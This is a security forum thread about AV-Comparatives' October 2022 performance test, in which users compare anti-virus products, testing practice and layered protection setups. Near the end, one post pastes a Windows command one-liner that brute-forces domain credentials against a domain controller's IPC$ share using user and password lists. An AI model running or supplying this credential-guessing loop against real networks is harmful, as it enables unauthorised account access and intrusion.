AV-Comparatives Performance Test - October 2022

Discussion in 'other anti-virus software' started by Spartan, Nov 8, 2022.

1. Spartan

Spartan Registered Member

Chart: https://www.av-comparatives.org/comparison/?usertype=consumer&chart_chart=chart4&chart_year=2022&chart_month=10&chart_sort=1&chart_zoom=0

Article: https://www.av-comparatives.org/tests/performance-test-october-2022/

2. xxJackxx

xxJackxx Registered Member

Pretty much as expected.

3. amico81

amico81 Registered Member

Trend Micro with some performance improvements? Was heavy in the past...Gdata too

4. bellgamin

bellgamin Registered Member

Shouldn't Microsoft Defender get some sort of ... ah ... prize for their performance results?

I was pleasantly surprised by Kaspersky's good performance. I thought it was a fairly "system-heavy" AV. Looks like I was wrong.

BTW, I am presently running G-Data as my AV. G-data is quite zippy on my Intel i5 laptop computer, bought 2012. Go figure. :rolleyes:

5. Bunkhouse Buck

Bunkhouse Buck Registered Member

I don't think these tests mean much because they were tested on a specific machine with specific specs. It means something for their test machine and that's it.

I have tested every one of them on four computers with various configurations and the results shown do not correlate to a significant degree with my experience (Panda for example, was "heavy" on all four of my computers and Microsoft very light).

Don't be seduced by any test results. Do what works for you.

Last edited: Nov 8, 2022
  6. bellgamin

I agree -- to a degree.

The exception is --- K7. It WILL be the lightest on system resources -- by far -- no matter what computer you run it on. It took some really tight coding to keep it that light. Of course, K7 is India-based and I assume that many computer users in India & neighboring countries (such as Pakistan) are running older computers and, possibly, older Windows versions as well. So I suppose that K7 folks HAD to keep their AV light because of their primary market.

I was a happy user of K7 for several months before I reluctantly switched over to G-data. I switched because I got impatient while waiting for K7 to formally include its new AI (MAT) into its AVs. They announced MAT but haven't yet made it readily available for current K7 users.. WEIRD! Also, dealing with K7's support team can be confusing at times -- possibly because of language issues. However, K7 consistently rates as "pretty okay" (not great) in AV-C's tests and "pretty okay" is good enough for me, given my level of risk and my other layers of security.

Last edited: Nov 9, 2022
  7. ankupan

ankupan Registered Member

Yes, K7 is really good on lower systems.

Indian Price is USD 40 for 5 systems for 5 Years.

Good deal.

8. Russ64

Russ64 Registered Member

Why do they never include Webroot? Been using it for years on 3 machines and never had an infection.

Also use Malwarebytes as I get it free from my bank. Don't like the "false positives" as it flags a lot as PUPs.

9. Antarctica

Antarctica Registered Member

Because Webroot choose not to be tested, it’s a question of methodology the say.;)

10. pegas

pegas Registered Member

Yeah, finding an app with the right balance between performance and efficiency isn't easy. But as per the test ESET and Kaspersky should be the choices for me, actually it is because I'm using ESET :)

11. Spartan

It's a shame they stopped testing F-Secure

12. Oldie1950

Oldie1950 Registered Member

Only AV programs from manufacturers who pay for the tests are tested.

13. Spartan

got it, they were in the tests last year and they were leading in the performance department back then.

14. Krond

Krond Registered Member

Ähmm, no. The last test of F-Secure was 2020 in the performance-tests. And only in Oct. they were fast. All the previous tests were only in the middle of the testfield.

15. bellgamin

Has Webroot reported an actual malware attack during those 3 years?

Last edited: Nov 10, 2022
  16. moredhelfinland

moredhelfinland Registered Member

With default settings, webroot is...crap. But its actually quite good...when properly configured.
    Gdata+Voodooshield is great combo. When i was using this combo, set Gdata to only check on execution only, because voodooshield reacts faster than gdata. So if malware bypass voodooshield protection mechanism. There's gdata and its good BB to catch it.
    But...Gdata BB does not protect some vital registry keys modifications, like disable windows key, control panel etc etc. Tested this myself when i tested several AV BB components only. Thats why i recommend something like Gdata+voodooshield and maybe third layer...Spyshelter.

17. bellgamin

Excellent suggestions! Many thanks.

I liked G-Data a lot but went back to K7. I found that K7 finally has MAT included in their top versions. Ergo, I paid for & installed K7's Total Security version. I run it together with VoodooShield, of course.

Why go from G-Data back to K7? While using G-Data, I made an error on one of its firewall alerts. Specifically I allowed an app to connect out when I wanted to dis-allow. The steps for correcting that mistake were very convoluted. K7's firewall is much easier to configure, & offers more options, as well.

18. I3rYcE

I3rYcE Registered Member

Could you share with us the new interface ?

19. moredhelfinland

I'm using a software firewall that can block all outbound connections untill firewall driver is loaded.
    Some malwares can do, when you shutdown/restart your computer, it modify windows firewall settings to open a port using typical netsh advfirewall firewall. Your favorite windows firewall based...firewall program might detect it but its too late.
    That's why i'm using firewall that it NOT depended windows own firewall, but using its OWN firewall kernel mode driver.

20. Spartan

What's MAT?

21. stapp

stapp Global Moderator

https://blog.k7computing.com/7-reasons-to-choose-k7-total-security-powered-by-mat/

22. roger_m

roger_m Registered Member

Some more information about MAT.
    https://www.cxotoday.com/press-rele...security-with-mat-to-commemorate-anniversary/

23. moredhelfinland

Strong words...i do like to see how it performs agains 0day samples.

24. moredhelfinland

When a hacker is inside your corporate networks, read this

25. moredhelfinland

@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @Net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @Echo [*] %n:%p && @Net use /delete \\COMPANYDC1\IPC$ > NULB

Beatifull crafted!

1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.